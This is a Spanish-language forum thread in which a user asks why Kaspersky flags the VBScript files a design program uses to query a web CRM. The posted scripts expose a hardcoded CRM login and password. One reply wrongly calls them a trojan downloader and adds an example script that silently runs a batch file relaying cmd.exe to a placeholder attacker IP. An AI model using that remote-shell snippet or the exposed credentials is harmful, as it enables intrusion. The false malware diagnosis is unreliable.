Kaspersky AV 7.0 Trial Version
Laptop Dell Vostro 1500
Intel Core Duo 2 CPU
T5470 @ 1.60GHz
1.60 GHz, 1GB RAM
Ayer instalé Kaspersky, Trial versión.
Al trabajar con la aplicación Winner (Diseño de Interiores, www.compusoftgroup.com) tengo qu conectarme a un CRM basado en web para que me de los datos de clientes y luego pueda seguir diseñando.
Al intentar acceder Kaspersky lo confunde con un troyano y no me deja acceder, me da los errores que adjunto en pantallazos.
He intentado configurar la exclusiones, pero parece que no lo estoy haciendo correctamente.
Full Version: Kaspersky no me permite usar otros programas
[quote name='Corto_1' date='12.08.2008 12:20' post='729264']
Kaspersky AV 7.0 Trial Version
Laptop Dell Vostro 1500
Intel Core Duo 2 CPU
T5470 @ 1.60GHz
1.60 GHz, 1GB RAM
Ayer instalé Kaspersky, Trial versión.
Me faltanban datos
Windows XP profesional Versión 2002 SP3
No hay más programas de seguridad, excepto el Firewall de Windows, y desactivandolo desde services.msc el resultado es el mismo
Al trabajar con la aplicación Winner (Diseño de Interiores, www.compusoftgroup.com) tengo qu conectarme a un CRM basado en web para que me de los datos de clientes y luego pueda seguir diseñando.
Al intentar acceder Kaspersky lo confunde con un troyano y no me deja acceder, me da los errores que adjunto en pantallazos.
He intentado configurar la exclusiones, pero parece que no lo estoy haciendo correctamente.
Kaspersky AV 7.0 Trial Version
Laptop Dell Vostro 1500
Intel Core Duo 2 CPU
T5470 @ 1.60GHz
1.60 GHz, 1GB RAM
Ayer instalé Kaspersky, Trial versión.
Me faltanban datos
Windows XP profesional Versión 2002 SP3
No hay más programas de seguridad, excepto el Firewall de Windows, y desactivandolo desde services.msc el resultado es el mismo
Al trabajar con la aplicación Winner (Diseño de Interiores, www.compusoftgroup.com) tengo qu conectarme a un CRM basado en web para que me de los datos de clientes y luego pueda seguir diseñando.
Al intentar acceder Kaspersky lo confunde con un troyano y no me deja acceder, me da los errores que adjunto en pantallazos.
He intentado configurar la exclusiones, pero parece que no lo estoy haciendo correctamente.
Ya has probado meter eso en las aplicaciones de confianza en el momento que te lo detecta...????
De seguro debe de funcionar si cierras el antivirus...!!!
o desactiva la opcion Antivirus de Internet.... en las configuraciones del KIS/KAV...!!!
Saludos...
De seguro debe de funcionar si cierras el antivirus...!!!
o desactiva la opcion Antivirus de Internet.... en las configuraciones del KIS/KAV...!!!
Saludos...
Si añades Winner (Diseño de Interiores, www.compusoftgroup.com) a la zona de confianza y además
indicas que Kaspersky acepte toda actividad de red, te va a funcionar.
Pruébalo y nos dices algo, vale?
indicas que Kaspersky acepte toda actividad de red, te va a funcionar.
Pruébalo y nos dices algo, vale?
(arquezvall2004 @ 12.08.2008 22:02) 
Ya has probado meter eso en las aplicaciones de confianza en el momento que te lo detecta...????
De seguro debe de funcionar si cierras el antivirus...!!!
o desactiva la opcion Antivirus de Internet.... en las configuraciones del KIS/KAV...!!!
Saludos...
De seguro debe de funcionar si cierras el antivirus...!!!
o desactiva la opcion Antivirus de Internet.... en las configuraciones del KIS/KAV...!!!
Saludos...
Cerrando el antivirus funciona correctamente. Esto es lo que tengo en la zona de confianza y el resultado es el mismo
C:\Documents and Settings\Compusoft\Mis documentos\ not-a-virus*.*
C:\Winner\Modules\Tsk\GetCustomer.vbs not-a-virus*
C:\Winner\Modules\Tsk\GetNewOrderTrackingToken.vbs not-a-virus*
C:\Winner\Modules\Tsk\GetOpenProjectsList.vbs not-a-virus*
C:\DOCUME~1\COMPUS~1\CONFIG~1\Temp\GetOpenProjectsList.vbs not-a-virus*
C:\Winner\*.* C:\winner\*.*
C:\DOCUME~1\COMPUS~1\CONFIG~1\TEMP\GETCUSTOMER.VBS not-a-virus*
Imagino que no lo tengo bien hecho....
Dentro de las opciones tengo desactivado el Antivirus de Internet y la defensa proactiva
El erro que me da todas las veces es: (ver imagen adjunta)
Muchas gracias!!
(Visconti12 @ 13.08.2008 10:57)
Si añades Winner (Diseño de Interiores, www.compusoftgroup.com) a la zona de confianza y además
indicas que Kaspersky acepte toda actividad de red, te va a funcionar.
Pruébalo y nos dices algo, vale?
indicas que Kaspersky acepte toda actividad de red, te va a funcionar.
Pruébalo y nos dices algo, vale?
Gracias por tu respuesta Visconti.
Tengo winner el el área de confianza de Kaspersky, pero calculo que lo tendré mal envio pantallazo con exclusiones y con aplicaciones de confianza
QUOTE(Corto_1 @ 13.08.2008 15:13)
Gracias por tu respuesta Visconti.
Tengo winner el el área de confianza de Kaspersky, pero calculo que lo tendré mal envio pantallazo con exclusiones y con aplicaciones de confianza
Tengo winner el el área de confianza de Kaspersky, pero calculo que lo tendré mal envio pantallazo con exclusiones y con aplicaciones de confianza
Aquí debes añadir el ejecutable (quizás winner.exe a algo así) y no la carpeta.
El apartado de Máscaras de Exclusión es para indicar a KIS/KAV algunos programas que simulan amenazas
pero sabemos a ciencia cierta que son de confianza.
(Visconti12 @ 13.08.2008 20:33)
Aquí debes añadir el ejecutable (quizás winner.exe a algo así) y no la carpeta.
El apartado de Máscaras de Exclusión es para indicar a KIS/KAV algunos programas que simulan amenazas
pero sabemos a ciencia cierta que son de confianza.
El apartado de Máscaras de Exclusión es para indicar a KIS/KAV algunos programas que simulan amenazas
pero sabemos a ciencia cierta que son de confianza.
Hola buenos días y gracias por tu repsuesta!!
Lamentablemente he hecho los cambios y me sigue dando el mismo problema, provocado por Kaspersky puesto que al desactivarlo me descargo los datos sin problemas.
He cambiado la configuración según tus indicaciones (envio pantallazo) pero como decía me sigue dando el mismo error (envio también pantallazo)
Gracias
Lo ideal sería modificar el programa para que ejecute la aplicación en una carpeta a elegir y añadir esa carpeta completa a la zona de confianza.
Si no se puede intenta crear una mascara y tìpo c:\docu...\...\..\*.vbs agregandola a la zona de confianza.
Saludos
Si no se puede intenta crear una mascara y tìpo c:\docu...\...\..\*.vbs agregandola a la zona de confianza.
Saludos
(RadarpSP @ 14.08.2008 22:06)
Lo ideal sería modificar el programa para que ejecute la aplicación en una carpeta a elegir y añadir esa carpeta completa a la zona de confianza.
Si no se puede intenta crear una mascara y tìpo c:\docu...\...\..\*.vbs agregandola a la zona de confianza.
Saludos
Si no se puede intenta crear una mascara y tìpo c:\docu...\...\..\*.vbs agregandola a la zona de confianza.
Saludos
Hola RadarSp, gracias por tu respuesta. No he contestado hasta ahora por estar de vacaciones..sorry!!
La aplicación se ejecuta en la carpeta temporal dentro
Tengo varias máscaras de exclusión creadas:
C:\Documents and Settings\Compusoft\Mis documentos\ not-a-virus*.*
C:\Winner\Modules\Tsk\GetCustomer.vbs not-a-virus*
C:\Winner\Modules\Tsk\GetNewOrderTrackingToken.vbs not-a-virus*
C:\Winner\Modules\Tsk\GetOpenProjectsList.vbs not-a-virus*
C:\DOCUME~1\COMPUS~1\CONFIG~1\Temp\GetOpenProjectsList.vbs not-a-virus*
C:\Winner\*.* C:\winner\*.*
C:\DOCUME~1\COMPUS~1\CONFIG~1\TEMP\GETCUSTOMER.VBS not-a-virus*
y el resultado es el mencionado anteriormente, tal vez no tengo hechas correctamente las máscaras
Con respecto a la otra posibilidad voy a ver que se puede hacer y os comento algo.
un saludo
Abre el vbs y postea la sintasix aki lo mas seguro es que este infectado si no pasamelo por MP si te fija es una firma Generica TROJAN-DOWLOADER .JS.gen
Puedes ver la sintasis del vbs atraves del Block de Notas
Saludos
Puedes ver la sintasis del vbs atraves del Block de Notas
Saludos
Te recomiendo que abras un ticket de soporte en helpdesk de Kaspersky, enviandoles toda la informacion del programa, CRM, los errores que te da, etc.. Para que te estudien una solución a tu problema concreto.
Por si acaso, inicia el equipo en modo seguro, realiza un escaneo completo del sistema, con las firmas de kaspersky actualizadas y todas las opciones al maximo, para asegurarnos.
Saludos
Por si acaso, inicia el equipo en modo seguro, realiza un escaneo completo del sistema, con las firmas de kaspersky actualizadas y todas las opciones al maximo, para asegurarnos.
Saludos
(davile @ 1.09.2008 16:16)
Abre el vbs y postea la sintasix aki lo mas seguro es que este infectado si no pasamelo por MP si te fija es una firma Generica TROJAN-DOWLOADER .JS.gen
Puedes ver la sintasis del vbs atraves del Block de Notas
Saludos
Puedes ver la sintasis del vbs atraves del Block de Notas
Saludos
Gracias por tu respuesta
El programa usa tres archivos vbs, adjunto copia de los tres..entiendo que es lo que me solicitas.
Archivo "GetCustomer.vbs"
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
strCustId = "000080005162"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getCustomer xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strCustId & "</projectid>" & _
"</getCustomer>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getCustomer"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getCustomer_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Archivo "GetNewOrderTrackingToken.vbs"
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
strProjectID = "000080005162"
strSupplierID = "GEBA"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getNewOrderTrackingToken xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strProjectID & "</projectid>" & _
"<supplierid>" & strSupplierID & "</supplierid>" & _
"</getNewOrderTrackingToken>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getNewOrderTrackingToken"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getNewOrderTrackingToken_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Archivo "GetOpenProjectsList.vbs"
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
strCompanyID = "9999"
strFirstName = "perico"
strName = ""
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getOpenProjectsList xmlns=""http://tempuri.org/"">" & _
"<companyid>" & strCompanyID & "</companyid>" & _
"<customerfirstname>" & strFirstName & "</customerfirstname>" & _
"<customerlastname>" & strName & "</customerlastname>" & _
"</getOpenProjectsList>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getOpenProjectsList"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getOpenProjectsList_Res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Entiendo que esto es lo que me pides, si no fuera así por favor especificamelo. Gracias
(Caos @ 1.09.2008 16:25)
Te recomiendo que abras un ticket de soporte en helpdesk de Kaspersky, enviandoles toda la informacion del programa, CRM, los errores que te da, etc.. Para que te estudien una solución a tu problema concreto.
Por si acaso, inicia el equipo en modo seguro, realiza un escaneo completo del sistema, con las firmas de kaspersky actualizadas y todas las opciones al maximo, para asegurarnos.
Saludos
Por si acaso, inicia el equipo en modo seguro, realiza un escaneo completo del sistema, con las firmas de kaspersky actualizadas y todas las opciones al maximo, para asegurarnos.
Saludos
Caos, gracias por tu respuesta, pero estoy usando una versión de prueba de Kaspersky, por lo que no puedo usar esa utilidad. Gracias de cualquier forma
Hola Buenas TRas comprobar la Sintaxis son unas especie de Fakes que actuan como DOwloader si nos fijamos el archivo vbs tiene cuerpo:
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
Despues utiliza un comando para descargar un archivo ala pc de forma oculto vamos actua como un DOWLOADER
strProjectID = "000080005162"
strSupplierID = "GEBA"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getNewOrderTrackingToken xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strProjectID & "</projectid>" & _
"<supplierid>" & strSupplierID & "</supplierid>" & _
"</getNewOrderTrackingToken>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getNewOrderTrackingToken"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getNewOrderTrackingToken_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Quien ha echo la sintaxis del vbs ??
Tambien puede ser que kaspersky te lo detecte por la sintasix ya que tiene sintaxis de dowloader !!
TE RECOMIENDO DESINFECTAR TU PC:
AMI TAMBIEN ME LO DETECTA AUNQUE MODIFIQUE EL CODE YA QUE ESTA EN UNA FIRMA GENERICA:
LA SINTASIX DEL SCRIPT ES MALIOSO TE ACONSEJJO DESINFECTAR LA PC
http://img440.imageshack.us/img440/2734/dibujohu0.jpg
Ejemplo de Scripts :
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide
Este escrip seria para controlar la shell de un user y su istalacion seria silenciosa oculta el archvio se istalaria en system32 !! (El script no es malisioso si no esta con su ejecutable)
Saludos
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
Despues utiliza un comando para descargar un archivo ala pc de forma oculto vamos actua como un DOWLOADER
strProjectID = "000080005162"
strSupplierID = "GEBA"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getNewOrderTrackingToken xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strProjectID & "</projectid>" & _
"<supplierid>" & strSupplierID & "</supplierid>" & _
"</getNewOrderTrackingToken>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getNewOrderTrackingToken"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getNewOrderTrackingToken_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Quien ha echo la sintaxis del vbs ??
Tambien puede ser que kaspersky te lo detecte por la sintasix ya que tiene sintaxis de dowloader !!
TE RECOMIENDO DESINFECTAR TU PC:
AMI TAMBIEN ME LO DETECTA AUNQUE MODIFIQUE EL CODE YA QUE ESTA EN UNA FIRMA GENERICA:
LA SINTASIX DEL SCRIPT ES MALIOSO TE ACONSEJJO DESINFECTAR LA PC
http://img440.imageshack.us/img440/2734/dibujohu0.jpg
Ejemplo de Scripts :
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide
Este escrip seria para controlar la shell de un user y su istalacion seria silenciosa oculta el archvio se istalaria en system32 !! (El script no es malisioso si no esta con su ejecutable)
Saludos
(davile @ 1.09.2008 17:07)
Hola Buenas TRas comprobar la Sintaxis son unas especie de Fakes que actuan como DOwloader si nos fijamos el archivo vbs tiene cuerpo:
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
Despues utiliza un comando para descargar un archivo ala pc de forma oculto vamos actua como un DOWLOADER
strProjectID = "000080005162"
strSupplierID = "GEBA"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getNewOrderTrackingToken xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strProjectID & "</projectid>" & _
"<supplierid>" & strSupplierID & "</supplierid>" & _
"</getNewOrderTrackingToken>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getNewOrderTrackingToken"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getNewOrderTrackingToken_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Quien ha echo la sintaxis del vbs ??
Tambien puede ser que kaspersky te lo detecte por la sintasix ya que tiene sintaxis de dowloader !!
TE RECOMIENDO DESINFECTAR TU PC:
AMI TAMBIEN ME LO DETECTA AUNQUE MODIFIQUE EL CODE YA QUE ESTA EN UNA FIRMA GENERICA:
LA SINTASIX DEL SCRIPT ES MALIOSO TE ACONSEJJO DESINFECTAR LA PC
http://img440.imageshack.us/img440/2734/dibujohu0.jpg
Saludos
strURL = "http://crm.thesingularkitchen.com/WebServiceTSK/WebServiceTSK.asmx"
strPassword = "thiUs9uV1e7"
strLogin = "sedestsk\pedidoswinner"
Despues utiliza un comando para descargar un archivo ala pc de forma oculto vamos actua como un DOWLOADER
strProjectID = "000080005162"
strSupplierID = "GEBA"
strXml = "<?xml version=""1.0"" encoding=""utf-8""?>" & _
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">" & _
"<soap:Body>" & _
"<getNewOrderTrackingToken xmlns=""http://tempuri.org/"">" & _
"<projectid>" & strProjectID & "</projectid>" & _
"<supplierid>" & strSupplierID & "</supplierid>" & _
"</getNewOrderTrackingToken>" & _
"</soap:Body>" & _
"</soap:Envelope>"
Set objDom = CreateObject("MSXML2.DOMDocument")
' Load XML
objDom.async = False
objDom.loadXML strXml
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "POST", strURL, False, strLogin, strPassword
objXML.setRequestHeader "Content-Type", "text/xml; charset=utf-8"
objXML.setRequestHeader "SOAPAction", "http://tempuri.org/getNewOrderTrackingToken"
objXML.send strXml
strXMLDoc = objXML.responseText
intRet = objXML.status
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile( "getNewOrderTrackingToken_res.txt", 2, True)
WriteStuff.WriteLine( intRet )
WriteStuff.WriteLine( strXMLDoc )
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
Set objXML = Nothing
Quien ha echo la sintaxis del vbs ??
Tambien puede ser que kaspersky te lo detecte por la sintasix ya que tiene sintaxis de dowloader !!
TE RECOMIENDO DESINFECTAR TU PC:
AMI TAMBIEN ME LO DETECTA AUNQUE MODIFIQUE EL CODE YA QUE ESTA EN UNA FIRMA GENERICA:
LA SINTASIX DEL SCRIPT ES MALIOSO TE ACONSEJJO DESINFECTAR LA PC
http://img440.imageshack.us/img440/2734/dibujohu0.jpg
Saludos
HOla Davile y gracias por tu respuesta!! la función del script es conseguir que el programa se conecte a un CRM en base web y que se descargue datos que están centralizados, por lo que entiendo que trabaja como un downloader.
El script está desarrollado por la gente del programa Winner, tendría la posibilidad de contactar con ellos.
Aparte de desinfectar, hay alguna otra cuestión que pueda hacer??
Gracias de nuevo
Pues creo que no la gente de Winner estan usando la sintasix de un DOWLOADER para hacer descargar datos no se si algun archivo del scripts es malisioso lo que si se es que la sintaxis es de un DOWLOADER ( Puede que el Scripts no descarge ningun Archivo malisioso pero sera detectados por KASPERSKY)
Mandale la sintaxis a newvirus@kaspersky.com y dirle en ingles si lleba ha algun archivo malioso !!
Si tengo tiempo despues compruebo 1 a 1 a los archivos que descarga !!
Saludos
Mandale la sintaxis a newvirus@kaspersky.com y dirle en ingles si lleba ha algun archivo malioso !!
Si tengo tiempo despues compruebo 1 a 1 a los archivos que descarga !!
Saludos
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.